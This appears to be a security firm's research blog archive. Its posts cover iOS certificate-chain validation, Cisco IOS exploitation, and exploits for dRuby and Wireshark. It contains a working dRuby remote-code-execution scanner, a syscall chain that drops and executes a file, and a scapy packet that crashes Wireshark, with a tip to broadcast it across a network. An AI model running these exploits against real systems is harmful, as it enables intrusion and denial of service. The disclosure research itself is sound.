Wed Feb 1 20:07:04 CET 2012

Cisco Incident Response (CIR) 1.1 Open Source Release

Recurity Labs created a system for the inspection of legacy Cisco IOS memory dumps back in 2008. The tool, called Cisco Incident Response, was meant to identify successful and unsuccessful binary exploitation attempts against Cisco routers running IOS 11.x and 12.x. IOS 15.x is now available, but doesn't differ much from the previous releases in terms of internal design.

We ran an online service for uploading and analyzing IOS images together with core dumps generated from them. This service has been used by various people, but not a single core dump contained indications of an actual binary exploit against the platform. It seems that it's simply too easy to pwn a company by the traditional means of browser, Flash, or Java exploits, EXE files in email, social engineering, or cloud services.

To support nostalgic hobbyists concerning themselves with the same questions half a decade later, we decided to publish the source code of CIR today, in order to allow anyone to use it and inspect its inner workings. We believe that Kerckhoffs's principle also holds true for defense and detection systems. Therefore it is educational to look at code bases that have been tested in production for quite some time.

The code is interesting beyond the embedded knowledge about Cisco IOS data structures. Here are a couple of points for the inclined reader:

  • 23k lines of code, completely managed .NET (C#)
  • Plug-in based knowledge system, where every plug-in consumes and provides some type of abstracted information about the subject, formulated by .NET types
  • Several lists with differing offsets between IOS minor versions and service releases, for those assuming that IOS data structures will always look the same between e.g. 12.4.3 and 12.4.3J.
  • An ELF file format parser that could be useful in other projects
  • Report generation and daemon mode, to allow CIR to be used in corporate and provider networks automatically.
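The plug-in scheme can be modeled roughly like this (a Ruby sketch; CIR itself is C# and keys plug-ins on .NET types, and all names below are made up for illustration):

```ruby
# Each plug-in declares what it consumes and what it provides; the pipeline
# runs whichever plug-in has all its inputs available and its output missing.
class Plugin
  attr_reader :consumes, :provides

  def initialize(consumes, provides, &body)
    @consumes = consumes
    @provides = provides
    @body = body
  end

  def run(facts)
    @body.call(facts)
  end
end

plugins = [
  Plugin.new([:core_dump],   :heap_blocks) { |f| "blocks parsed from #{f[:core_dump]}" },
  Plugin.new([:heap_blocks], :verdict)     { |f| "no overflow in: #{f[:heap_blocks]}" },
]

facts = { core_dump: 'router1.core' }
while (p = plugins.find { |pl| pl.consumes.all? { |c| facts.key?(c) } && !facts.key?(pl.provides) })
  facts[p.provides] = p.run(facts)
end
puts facts[:verdict]  # => no overflow in: blocks parsed from router1.core
```

The nice property of such a scheme is that plug-ins never call each other directly; the dependency graph emerges from the consumed and provided types.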
The code is released under GPLv3, and can be found at http://cir.recurity.com. We also provide a binary distribution for those who simply want to use it.


Posted by FX | Permanent link

Tue Aug 9 18:34:11 CEST 2011

CVE-2011-0228 and the Opera Mini UI-Design

Recurity Labs received user reports, followed by our own tests, that Opera Mini is affected by the CVE-2011-0228 X.509 certificate validation issue, originally reported for Apple iOS.

Upon filing a bug with Opera Software (ID SKIRNE-136848), we tried to contact them directly. With some external help, we managed to get in contact with security people at Opera and received the following interesting statement:

Thanks for reporting an issue with Opera.

While you are correct that Opera Mini does not display a certificate
warning about chains with unknown Root certificates, there is, however,
a significant difference between what happened in iOS and what happens
in Opera Mini. Opera Mini will not indicate that such pages are secure,
that is, no padlock or similar indication is displayed for the web site
affected by this, giving the same security indications as it would for
an unencrypted site, which is the same as would have been displayed if
the user manually accepted the certificate.

Not showing a dialog was a design decision by the Opera Mini team, due
to the transcoder architecture of Opera Mini, and in part the
complexity of having the transcoder (proxy) server display a dialog at
the device and the obtain the result before continuing.

For more about Opera Mini security see
http://www.opera.com/mobile/help/faq/#security.

Reviewing the provided FAQ URL, we can learn that Opera Mini will show a padlock (at the top right corner) if the connection to the web site was secured. No padlock is shown for unsecured sites using HTTP.
When testing Opera Mini with https://iSSL.recurity.com, no padlock is shown. However, the URL in the address bar still says https:// with no indication that anything might be wrong. Judging from the user feedback we received, it is not clear to users that the absence of the padlock means that certificate validation failed.
In our emulation environment, we also discovered that on small screen devices, the padlock might not even be on-screen when loading a site.

Opera could easily display a failed certificate verification using means other than dialog boxes, e.g. through a red background in the address bar, similar to Internet Explorer.
Given the current approach, we recommend not using Opera Mini for anything requiring a secure connection to a web site, especially considering that Opera Mini does not provide end-to-end encryption in any case.


Posted by FX | Permanent link

Tue Jul 26 22:25:23 CEST 2011

CVE-2011-0228 iOS certificate chain validation issue in handling of X.509 certificates

Recurity Labs recently conducted a project for the German Federal Office for Information Security (BSI), which (amongst others) also concerned the iOS platform. During the analysis, a severe vulnerability in the iOS X.509 implementation was identified. When validating certificate chains, iOS fails to properly check the X.509v3 extensions of the certificates in the chain. In particular, the "Basic Constraints" section of the supplied certificates is not verified by iOS. In the Basic Constraints section, the issuer of a certificate can encode whether or not the issued certificate is a CA certificate, i.e. whether or not it may be used to sign other certificates. Not checking the CA bit of a certificate basically means that every end-entity certificate can be used to sign further certificates.

To provide an example: When a CA issues a certificate to a web site, the CA will usually set the CA bit of this certificate to false. Assume the attacker has such a certificate, issued by a trusted CA to attacker.com. The attacker can now use their private key to sign another certificate, which may contain arbitrary data. This could for instance be a certificate for bank.com or, even worse, a certificate containing multiple common names: *.*, *.*.*, ... iOS fails to check whether the attacker's certificate was actually allowed to sign subsequent certificates and considers the so-created universal certificate valid. The attacker could now use this certificate to intercept all SSL/TLS traffic originating from an iOS device. However, SSL/TLS is not the only use of X.509. Every application that makes use of the iOS crypto framework to validate chains of X.509 certificates is vulnerable.
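For illustration, such a rogue chain can be rebuilt with Ruby's stdlib OpenSSL bindings (all names are made up; a correct validator, unlike the affected iOS versions, rejects the chain because the intermediate has CA:FALSE):

```ruby
require 'openssl'

# Issue a certificate; self-signed when no issuer is given.
def make_cert(subject, key, issuer_cert, issuer_key, ca)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2                           # X.509v3
  cert.serial = rand(1 << 20) + 1
  cert.subject = OpenSSL::X509::Name.parse(subject)
  cert.issuer = issuer_cert ? issuer_cert.subject : cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = issuer_cert || cert
  # Basic Constraints: encodes whether this certificate may sign others.
  cert.add_extension(ef.create_extension('basicConstraints', "CA:#{ca}", true))
  cert.sign(issuer_key || key, OpenSSL::Digest::SHA256.new)
  cert
end

ca_key, leaf_key, rogue_key = Array.new(3) { OpenSSL::PKey::RSA.new(2048) }

ca    = make_cert('/CN=Trusted CA',   ca_key,    nil,  nil,      'TRUE')
leaf  = make_cert('/CN=attacker.com', leaf_key,  ca,   ca_key,   'FALSE') # end-entity
rogue = make_cert('/CN=bank.com',     rogue_key, leaf, leaf_key, 'FALSE') # signed by the leaf!

store = OpenSSL::X509::Store.new
store.add_cert(ca)
# A correct implementation notices that the intermediate is not a CA:
puts store.verify(rogue, [leaf])  # => false
puts store.error_string           # e.g. "invalid CA certificate"
```

The affected iOS versions skipped exactly this Basic Constraints check and accepted the rogue certificate as valid.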

The idea that Apple could have made an 8-year-old mistake was suggested by Bernhard 'bruhns' Brehm.

To test whether your iOS version is vulnerable, Recurity Labs has set up a Web site: https://iSSL.recurity.com. If the Safari browser on your iDevice allows you to visit this site without issuing a warning, your device is vulnerable. The certificate for this site was created using the above described technique. Please feel free to validate this by inspecting the certificate that the HTTP server supplies to you.


Posted by Greg | Permanent link

Thu May 12 18:06:51 CEST 2011

dRuby for Penetration Testers

I somehow like Ruby - a nice and shiny programming language. At some point last year, I decided to have a closer look at 'Distributed Ruby' (also called dRuby). dRuby is all about easily usable objects and method invocations over the network.

So no long words: let's just drop into some simple dRuby server code:

01  require 'drb/drb'
02  URI="druby://localhost:8787"
03  class TimeServer
04    def get_current_time
05      return Time.now
06    end
07  end
08  FRONT_OBJECT=TimeServer.new
09  $SAFE = 1 # disable eval() and friends
10  DRb.start_service(URI, FRONT_OBJECT)
11  DRb.thread.join

Lines 03 to 07 define a class TimeServer with the method get_current_time. All the magic happens in line 10, where the dRuby service is started with a TimeServer instance as the exposed object. You'll probably have noticed line 09, where it says $SAFE = 1. This nifty variable turns on tainting and should prevent you from executing arbitrary code on the server side (that's basically what the documentation says). No worries, we'll come back to circumventing $SAFE later.

But first, let's look at the client side. Using this service would be as simple as:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 timeserver = DRbObject.new_with_uri(SERVER_URI)
05 puts timeserver.get_current_time

So here, after starting the dRuby service in line 03 and getting a remote object in line 04, we can simply call methods of that object over the wire, as done in line 05. That's all that's needed for a dRuby client.

Now let's start building a more useful client: namely, a scanner that checks whether $SAFE is set.

01 #!/usr/bin/ruby
02 require 'drb/drb'
03
04 # The URI to connect to
05 SERVER_URI= ARGV[0]
06
07 DRb.start_service
08 undef :instance_eval
09 t = DRbObject.new_with_uri(SERVER_URI)
10 
11 begin
12   a = t.instance_eval("`id`")
13   puts "[*] eval is enabled - you are:"
14   puts a
15 rescue SecurityError => e
16   puts "[*] sorry, eval is disabled"
17 rescue => e
18   puts "[*] likely not a druby port"
19 end

This scanner checks remotely whether the developer forgot to set $SAFE. If so, it will tell you the ID of the user running the dRuby service. Of course you are free to alter it to do more fun stuff with the server, or you could just use the respective Metasploit module.

But now, back from the shiny Ruby world to some bug hunting. So: what could possibly go wrong when pushing serialized objects back and forth over the wire?

My first attempts of poking around in dRuby with $SAFE set were as follows:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 t = DRbObject.new_with_uri(SERVER_URI)
05 t.eval("`id`")

Here in line 05 I tried to call eval on the remote object. Unfortunately this resulted in the following error:

NoMethodError: private method `eval' called for #<TimeServer:0xb7821a88>:TimeServer

While playing around further with dRuby and looking into the source, I found the following piece of code in drb/drb.rb:

    # List of insecure methods.
    #
    # These methods are not callable via dRuby.
    INSECURE_METHOD = [
      :__send__
    ]

Here, __send__ gets blacklisted from being called via dRuby. Unfortunately, however, there is also the plain send method, which is not on that list, as described in the Ruby documentation:

obj.send(symbol [, args...]) -> obj
obj.__send__(symbol [, args...]) -> obj

Invokes the method identified by symbol, passing it any arguments specified. 
You can use __send__ if the name send clashes with an existing method in obj. 
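That a blacklist containing only :__send__ misses the plain send alias can be reproduced locally, without any DRb involved. Here's a toy model of the server-side dispatch (class and method names are made up; drb's actual dispatch differs in detail):

```ruby
INSECURE_METHOD = [:__send__]  # mirrors drb's blacklist quoted above

class Victim
  private

  # stand-in for a private method such as eval
  def eval_like
    'reached a private method'
  end
end

# Toy dispatcher: reject blacklisted names, otherwise do a public dispatch,
# so private methods are normally unreachable.
def dispatch(obj, msg, *args)
  raise SecurityError, "insecure method #{msg}" if INSECURE_METHOD.include?(msg)
  obj.public_send(msg, *args)
end

v = Victim.new
begin
  dispatch(v, :eval_like)            # direct call: refused, method is private
rescue NoMethodError
  puts 'refused: eval_like is private'
end
# :send is public and absent from the blacklist - and it reaches private methods:
puts dispatch(v, :send, :eval_like)  # => reached a private method
```

The __send__ route raises the SecurityError as intended; the send route walks straight past both the blacklist and the privacy check.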

This very send method should give us the ability to call private methods on the object as follows:

t.send(:eval, "`id`")

This somehow worked, but we ran into another error:

SecurityError: Insecure operation - eval

I tried various functions taken from the class Object and the Kernel module, but all interesting functions were caught by a SecurityError. Wait a minute, really all of them? No, one little function was still willing to execute - and that function is syscall. So basically, we get free remote syscalls on the server side. When I reported this to the dRuby author, it turned out that tainting (which causes the SecurityError) had simply been forgotten for syscall.

In order to exploit this issue properly, we need a rather simple combination of syscalls to gain arbitrary command execution:

  • open() or creat() a file with permissions 777
  • write() some Ruby code to it
  • close() the file
  • fork() so that the dRuby service keeps running
  • execve() the just created file
This nice combo of syscalls is implemented in the Metasploit module as well. Alors! go out and play with it :)
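In dRuby client terms, the combo might look roughly like this. This is an untested sketch, not the Metasploit module: the syscall numbers are for 32-bit x86 Linux, the dropped file path is an arbitrary example, and the undef trick from the scanner above is reused to force syscall to be forwarded over the wire:

```ruby
require 'drb/drb'

# 32-bit x86 Linux syscall numbers (assumption: ia32 target)
SYS = { creat: 8, write: 4, close: 6, fork: 2, execve: 11 }

# Same idea as `undef :instance_eval` in the scanner: remove the local method
# so DRbObject#method_missing forwards syscall to the remote service.
Object.send(:undef_method, :syscall) if Object.private_method_defined?(:syscall)

def drop_and_exec(t, path, code)
  fd = t.syscall(SYS[:creat], path, 0777)      # create a file with mode 777
  t.syscall(SYS[:write], fd, code, code.size)  # write some Ruby code to it
  t.syscall(SYS[:close], fd)                   # close the file
  t.syscall(SYS[:fork])                        # keep the dRuby service running
  t.syscall(SYS[:execve], path, 0, 0)          # execute the just-created file
end

if ARGV[0]
  DRb.start_service
  drop_and_exec(DRbObject.new_with_uri(ARGV[0]), '/tmp/x.rb',
                "#!/usr/bin/ruby\nsystem('id > /tmp/x.out')\n")
else
  puts 'dry run only: pass druby://host:port to aim at a real service'
end
```

Each step is one raw syscall on the server side; nothing but the forgotten tainting of syscall is needed.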

If you take a closer look at the Metasploit module, you'll see a neat little trick I came up with: at first, when connecting, it's not possible to tell whether we are on a 32-bit or a 64-bit target system. Additionally, the syscall numbers differ between those two versions of Linux. So I chose syscall 20, which is getpid() on 32-bit systems but writev() on 64-bit systems. When we call this syscall with no arguments, it should succeed on 32-bit systems, while on 64-bit systems it will raise an error due to missing arguments. We can then catch this error and switch to our 64-bit syscall numbers.

Thanks at this point go out to two Metasploit guys: bannedit who poked me to put together an all-in-one exploit, and egypt who improved the instance_eval payload.

Last but not least, a short disclaimer: both aforementioned modules might not work as expected on different Ruby versions, as some of these have been patched (by turning on tainting), and some won't have syscall implemented at all. The exploit has been tested and found to work with the following versions of Ruby: Ruby 1.8.7 patchlevel 249, Ruby 1.9.0, and Ruby 1.9.1 patchlevel 378 (all running on 32-bit Linux systems). Tested as well and found vulnerable was the 64-bit version of Ubuntu 10.10 with both the ruby1.8 and ruby1.9 packages.


Posted by Joern | Permanent link

Wed Mar 9 18:34:04 CET 2011

At least, I got DoS

On January 11th, a new version of Wireshark was released. The release contained several security-relevant fixes. Inspired by this fact, I decided on a rainy evening to have a closer look. 'There must be a bit more of that', I thought.

So I fired up my browser and helped myself to the latest Wireshark source code (which was version 1.4.3 at that point in time). After unpacking it, I went straight to the dissectors, which reside in the source directory under epan/dissectors (that I knew from reading the advisories for the bugs fixed in 1.4.3).

Due to Wireshark having more than 1,000 different packet dissectors in this directory, I chose a pretty dumb approach to find interesting code parts:

/wireshark-1.4.3/epan/dissectors$ grep -Hrn memcpy packet-* | less
- a command that yields 553 results. So I scrolled through that list for a bit and finally decided to take a closer look at packet-ldap.c, containing the following tvb_memcpy call:
packet-ldap.c:4020:    tvb_memcpy(tvb, str, offset, len);
The corresponding function is:
int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)

- which can be found in line 3974 of packet-ldap.c.

The reason I grepped for memcpy was that I hoped to find some code where memcpy is used in a way that introduces a buffer overflow.

I quickly checked what the tvb_memcpy function does. It is defined in /epan/tvbuff.c and, as I suspected, it's a wrapper around good old memcpy which copies exactly len bytes from the packet buffer at offset to str.

But now let's have a look at the function body:

01 int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)
02 {
03  guint8 len;

04  len=tvb_get_guint8(tvb, offset);
05  offset+=1;
06  *str=0;
07  attributedesc_string=NULL;

08  while(len){
09    /* add potential field separation dot */
10    if(prepend_dot){
11      if(!maxlen){
12        *str=0;
13        return offset;
14      }
15      maxlen--;
16      *str++='.';
17      *str=0;
18    }

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

29    prepend_dot=TRUE;

30    if(maxlen<=len){
31      if(maxlen>3){
32        *str++='.';
33        *str++='.';
34        *str++='.';
35      }
36      *str=0;
37      return offset; /* will mess up offset in caller, is unlikely */
38    }
39    tvb_memcpy(tvb, str, offset, len);
40    str+=len;
41    *str=0;
42    maxlen-=len;
43    offset+=len;

44    len=tvb_get_guint8(tvb, offset);
45    offset+=1;
46  }
47  *str=0;
48  return offset;
49 }

The part I grep'ed for can be found on line 39, where tvb_memcpy copies from the tvb buffer into str. The tvb buffer is the buffer holding the packet data that came across the wire. At this point, my question was:

Can we overflow str in this function?

Unfortunately, it turns out we can't. First I checked all calls to this function; all of them came with a 256-byte char buffer and maxlen set to 255. The part of the packet at offset is a length field followed by a string of that length. The length len, which is read as an 8-bit value from the tvb buffer in line 04, cannot be greater than 255. And a proper check of maxlen (sized sufficiently) is performed in line 30.

Now you may ask, 'WhyTF does he bore me with non-exploitable code?!' Well, as the title already suggests - at least, I got DoS.

On line 19, a special case is handled, namely compressed strings. A length byte of 0xc0 denotes that what follows is not a string of length 0xc0, but rather an offset into the packet referencing another string. This concept was familiar to me, as it's used in DNS as well. Not so surprisingly, there have been issues with compressed strings in DNS handling code before.

Such compressed strings look like this, for instance: We have string1, describing 'recurity.com', at offset 0x23; plus we have another string2, which is 'foo.recurity.com', at another offset. This string2 can be compressed to '\x03foo\xc0\x23' - so now we'd have a string2 containing the length of 'foo' (\x03), and a reference to the offset which contains '\x08recurity\x03com'.

Let's read that part again:

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

As you can see, in line 26 there's a recursive call to dissect_mscldap_string. And in line 23, the offset is checked for not pointing to itself, because this would cause an infinite recursion. But, wait a minute - what if...

   +--------+   +--------+
   | label1 |   | label2 |
   +--------+   +--------+
     \__^_________^ /
         \_________/

...there was a label1 pointing to a label2, with that label2 pointing to label1 again?!

With this wee little trick we'd pass the self-reference check, but also gain infinite recursion, as both strings reference each other.
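The pointer chase and the missing guard are easy to model outside of Wireshark. Here's a toy Ruby re-implementation of the decoder (format simplified to length-prefixed labels, 0xc0 followed by a one-byte offset as a pointer, 0x00 as terminator) that adds the visited-offset check the C code lacks:

```ruby
# Decode a compressed string starting at offset, refusing to visit any
# offset twice - the check that would have prevented the crash.
def decode(buf, offset)
  visited = {}
  labels = []
  loop do
    return "#{labels.join('.')} [pointer loop detected]" if visited[offset]
    visited[offset] = true
    len = buf.getbyte(offset)
    if len.nil? || len.zero?
      return labels.join('.')
    elsif len == 0xc0
      offset = buf.getbyte(offset + 1)        # follow the compression pointer
    else
      labels << buf.byteslice(offset + 1, len)
      offset += 1 + len
    end
  end
end

# '\x08recurity\x03com\x00' at offset 0, 'foo' plus a pointer to it at offset 14:
buf = "\x08recurity\x03com\x00\x03foo\xc0\x00".b
puts decode(buf, 14)                  # => foo.recurity.com

# two pointers referencing each other, as in the crash:
puts decode("\xc0\x02\xc0\x00".b, 0)  # the guard fires instead of recursing forever
```

Without the visited hash, the second input would bounce between offsets 0 and 2 indefinitely - which, in the recursive C implementation, blows the stack.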

I decided I definitely wanted a PoC for this bug. Even if it's 'just a DoS', it might be entertaining enough to crash other folks' Wireshark ;) Developing a PoC was pretty straightforward. Again I chose kind of a lazy approach: since the code handles Connectionless LDAP (hence CLDAP), I searched the Internet for a bit and found this fancy site, where I grabbed the file 'samba4-join-rtl8139.pcap' containing some CLDAP packets. Wireshark happily dissected the CLDAP packets, especially the netlogon response:

The highlighted part contains a string reference to the very first string labeled 'Forest' with offset 0x18. So I dumped the whole UDP payload of that packet and pasted it into scapy. After this, I replaced the 'Forest' string with a reference to offset 0x1A and a reference back to 0x18 directly afterwards. In scapy, it'd look like this:

send(IP()/UDP(dport='ldap', sport=1025)/(
    "\x30\x81\xa2\x02\x01\x01\x64\x81\x9c\x04\x00\x30\x81\x97\x30\x81\x94"
    "\x04\x08\x6e\x65\x74\x6c\x6f\x67\x6f\x6e\x31\x81\x87\x04\x81\x84\x17"
    "\x00\x00\x00\xfd\x03\x00\x00\xda\xae\x52\xd0\x2f\xb4\xa9\x48\x8b\x16"
    "\x4e\xbc\x51\xf9\x60\xb4"
    + "\xc0" + "\x1a" + "\xc0" + "\x18" +
    "\x0e\x63\x6f\x6e\x74\x61\x63\x74\x2d\x73\x61\x6d\x62\x61\x34\xc0\x18"
    "\x0a\x43\x4f\x4e\x54\x41\x43\x54\x44\x4f\x4d\x00\x10\x5c\x5c\x43\x4f"
    "\x4e\x54\x41\x43\x54\x2d\x53\x41\x4d\x42\x41\x34\x00\x00\x00\x00\xc0"
    "\x61\x05\x00\x00\x00\xff\xff\xff\xff\x30\x0c\x02\x01\x01\x65\x07\x0a"
    "\x01\x00\x04\x00\x04\x00"))

This did the job just right - Wireshark silently crashed when sniffing on the loopback device.

This issue has been fixed in Wireshark version 1.4.4, which you can get here. Additionally, I wrote a ready-to-use Metasploit module which is available via msfupdate. The usage is quite simple:


msf > use auxiliary/dos/wireshark/cldap 
msf auxiliary(cldap) >show options

Module options (auxiliary/dos/wireshark/cldap):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  389              yes       The destination port
   SHOST                   no        This option can be used to specify a spoofed source address

msf auxiliary(cldap) > set RHOST 192.168.1.255
msf auxiliary(cldap) > run 

Pro-tip: use the local network's broadcast address as RHOST to crash all vulnerable Wiresharks running in your network segment :).


Posted by Joern | Permanent link

Thu May 27 14:43:26 CEST 2010

Jail-breaking the Cisco Unified Communication Manager (CUCM)

We have a long and very good relationship with the Cisco PSIRT team, reporting vulnerabilities to them and patiently waiting until fixes are provided. But some things we simply don't consider to be vulnerabilities in the typical sense of the word. This includes artifacts of product behavior that allow you to get the type of access to the product that you would expect.

The reasoning is that you already have to have a legitimate operating system administrator account on the CUCM, in order to "escalate" your privileges to a remote root shell. That the legitimate operating system administrator account, as provided by the product, isn't actually root, doesn't change the privilege situation one bit. Also, other people have published other guides (e.g. this one) before.

Therefore, we have decided to publish an article on how to gain the access you may want.

Please use this information only on lab systems or virtual installations. Rooting an actual Cisco appliance is not recommended and will most likely void your warranty.


Posted by FX | Permanent link

Wed May 26 17:53:44 CEST 2010

Carnival of the Cultures 2010

A great team needs a good environment to work in, and the environment doesn't stop at the office door. The cultural space in which you live also plays an important role and influences how people think and work. Berlin, home to Recurity Labs, luckily provides a rich and multifarious culture, which all of us enjoy a lot. Therefore, we occasionally want to give back to that environment, doing our little part to make it blossom some more.

For this year's Carnival of the Cultures, a multicultural street parade, we had the opportunity to support [multi:mat] and our long time DJ Friends from Dangerous Drums with getting their float onto the parade.



Our motto for this float: Work hard - Party harder!

We would like to thank [multi:mat] and Dangerous Drums for making this all possible, and of course the hundreds of thousands of people that participated in the parade.


Posted by FX | Permanent link | File under: events

Fri Mar 5 12:39:20 CET 2010

Guest Blogger at Microsoft BlueHat Blog

The Microsoft BlueHat team invited me to publish a rant on their BlueHat blog on TechNet. Of course, I had to deliver: Parser Central: Microsoft .NET as a Security Component


Posted by FX | Permanent link | File under: rants

Thu Jan 29 19:15:02 CET 2009

Corporate Responsibility

During a non-public security event, I saw a presentation by Olaf Kolkman about the new DNS server named Unbound. When he mentioned that the whole thing is written in C for performance reasons, I countered that we should simply stop developing production software in languages that produce unmanaged code. We got into quite some discussion with the whole audience after that, many people stating that there isn't an alternative and everything else is just too slow. I'm not buying this, for many obvious reasons, but that's for another post.

To put our abilities where my mouth is, we ended up performing a short source code audit for the Unbound developers. After all, Unbound is an effort to produce a reliable, validating, DNSSEC-ready name server, something we all want to see deployed on a larger scale. Sergio Alvarez, who by the way will be speaking at CanSecWest this year, looked at the code and, surprisingly, found it not riddled with remote code execution bugs. I was certainly happy about that, because it meant the next generation of DNS server deployments wouldn't be looking at a future comparable to ISC BIND's past.

That impression, however, was largely because Sergio compiled the code with all the ASSERT statements intact. Now, people running heavy-duty production DNS servers will most certainly try to make them as fast as possible, instructing the compiler to get rid of “debug” features like ASSERTs. That might not be a good idea. So here is another lesson learned: when building for production, you might want to keep those ASSERTs compiled in, since your server crashing on funny packets is probably better than sharing administrative control of the machine.

Other than that, I hope the Unbound team keeps up the good work, so people have one less excuse to not move to DNSSEC.


Posted by FX | Permanent link | File under: events

Thu Jan 29 16:55:44 CET 2009

What didn't fit into the talk.

Some of you might have heard that I gave a talk on Cisco IOS security at the 25C3 this year. The talk was unique for me in many ways, starting with the fact that it covered content going all the way back to the beginnings of Phenoelit up to material that was developed within Recurity Labs. It could be said that the talk was a nexus of research efforts in different areas of my life.

The second unique aspect was the sheer amount of stuff to cover, which prevented more in-depth reflection on some of the issues. This begins with the question of who would actually take over Cisco routers. The short answer is, of course: whoever can. But that needs to be taken apart in more detail. Let's focus on attacks that directly apply to the device in question and ignore for now that the easiest way to take over an entire network infrastructure is to attack the unpatched Sun servers running in the Network Operation Center.

Consider successful exploits a question of development cost. An exploit is in that respect not different than any other software: you find someone you think can actually pull it off, present your requirements and have them develop it for you. In almost all cases, this isn't going to be for free, so they will give you a price tag for the work, which in most cases is a linear function of the cost of a work hour for them. This implies that the better they are, the less hours they will need to develop the exploit for you, which makes it cheaper. This is what made exploits against Windows desktops so cheap that attackers mostly relied on them for gaining access to networks from what the network owners considered inside (an outdated but still widespread way of looking at it).

Our research concerning Cisco IOS security was always based on the assumption that there are entities in this world that have reached a reasonable development cost level for IOS exploits. But the publicly available knowledge on how to write IOS exploits didn't fit the bill, as it required jumping to some memory address that is specific to the IOS image running on the target. Assuming you don't know what image is running on that machine, you could still argue that the exploit writer could include a list of all possible image-dependent addresses in the exploit and try them out, one at a time. This would cause the router to reboot every time a wrong guess was tried.

In the presentation, I said that there are about 100,000 different IOS images in use. This is a very debatable number, as about 15,000 are supported by Cisco at any given time, and good network administrators will only run one or two IOS images in their entire network, oftentimes investing several months to figure out which exact image they want. However, when we fire up the Cisco Feature Navigator and ask it for all IOS images that support IP Routing, which should be all of them, we get “Showing 1-50 of 280715 results” at the bottom of the page. Wow, what a number. On page 5615 of the result listing (thank god they have a direct jump feature!), we see that this covers everything from IOS 12.4 down to 11.2. The number therefore doesn't even take very old networks into account, in which you do occasionally see images below 11.2 running.

It should be clear that trying them all out is not an option, especially considering reboot times of 30 seconds and more per attempt. Your exploit would constantly reboot a router for 2339 hours, or 97 days. And that doesn't take into account that you would need to obtain and disassemble them all first; estimated time with IDA: 5848 days, or 16 years.
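A quick sanity check of these figures (note that the roughly 30 minutes of disassembly per image is inferred here from the stated totals, not given in the original estimate):

```ruby
images = 280_715   # "Showing 1-50 of 280715 results"
reboot = 30        # seconds per wrong address guess

printf("%.0f hours, %.0f days\n",
       images * reboot / 3600.0,
       images * reboot / 86_400.0)   # => 2339 hours, 97 days

# the IDA estimate works out to about 30 minutes per image:
ida = images * 30 * 60
printf("%.0f days, %.0f years\n",
       ida / 86_400.0,
       ida / 86_400.0 / 365)         # => 5848 days, 16 years
```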

Therefore, either no one is exploiting IOS devices or they have found a better way to do it. Our Cisco Incident Response tool was developed in the hope of finding people attacking IOS devices, successfully or not. But then again, it's hard to write detection for the unknown, so we also had to look into ways of getting code execution stable. The method presented at the 25C3 (and documented here; feel free to post questions in the discussion section) only reduces the number of things you have to know about your target, it doesn't eradicate the problem in general. Now we only need to know the ROMMON version, and there are a lot fewer ROMMONs than IOS images out there.

For smaller machines, such as 2600s, updating ROMMON did not seem to be supported, and the version depends on the shipping date. However, after closer inspection, here comes an errata: Cisco does offer 6 updated ROMMONs for 2600 routers. For larger machines, e.g. 7206s, there are about 36 different versions known. That's a few orders of magnitude smaller than 280715. But it is also still far from the ultimate truth, as you need to know and have that ROMMON, as well as knowing a few things about the box, most importantly the hardware series. Some people like to include the hardware series in their router's DNS records, or name the PTR records of the IP addresses bound to a router's interfaces after the interface itself, which allows one to guess what type of metal it is.

Knowing the hardware platform is actually more important for the first and second stage shellcode than it is for getting stable code execution, as the same ROMMON seems to be applicable to a number of subtypes of routers, while one subtype may have memory wired to different addresses than another. But being lucky is also a valid option, which is what happened when we selected the memory area for a direct write: I assumed the memory at 0x80000000 on a 2600 is used for global IOS variable pointers, which is incorrect. So, errata #2: I was made aware that this is of course the exception vectors, after the MMU is turned on. Accordingly, this is a very good place to store two instructions.

There is still a lot to do and research when it comes to Cisco IOS and security. But stable, image-independent code execution finally allows us to make better assumptions about the attacks we should be looking for. It shows nicely that, even with CIR, we should not try to detect the exploitation while it happens, but focus on the shellcode functionality and the footprints it leaves. And the IP options vulnerability is a perfect example of why critical infrastructure should always dump its core files onto its own FLASH device, as dumping core over FTP doesn't really work too well when your “IP Input” process just got popped.


Posted by FX | Permanent link